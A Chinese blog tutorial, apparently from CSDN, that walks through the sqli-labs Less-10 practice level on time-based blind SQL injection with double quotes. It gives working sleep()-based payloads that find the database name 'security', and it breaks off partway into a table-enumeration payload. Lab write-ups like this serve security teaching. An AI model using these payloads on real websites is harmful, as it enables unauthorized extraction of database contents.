sqli-lab教程——Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

本文介绍了SQL注入中的时间型盲注,通过Less-10 GET - Blind - Time based - double quotes实例,展示了如何利用time-based盲注确定数据库信息、表名和字段,最终获取敏感数据。通过构造特定的payload,成功从'security'库中的'users'表中爆破出username和password。
摘要由CSDN通过智能技术生成

不管怎么输入,显示总是you are ...

 

 

考虑时间型盲注,payload 

?id=1" and sleep(3) --+ 

注意id=1,发现明显延迟,说明注入成功,接下来爆破就完了。

这道题的payload构造和第五题的方法一是一样的,一些废话就不多说了,这里就列一下过程,完事儿。

爆库payload

?id=1" and if(length(database())=4 , sleep(3), 1) --+ 

发现当?id=1" and if(length(database())=8 , sleep(3), 1) --+时明显延迟,所以库名长为8 

?id=1" and if(left(database(),1)='s' , sleep(3), 1) --+ 

发现明显延迟说明库名第一个字符为 's'

继续爆破?id=1" and if(left(database(),8)='security' , sleep(3), 1) --+

说明库名为 'security'

爆表payload

?id=1" and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值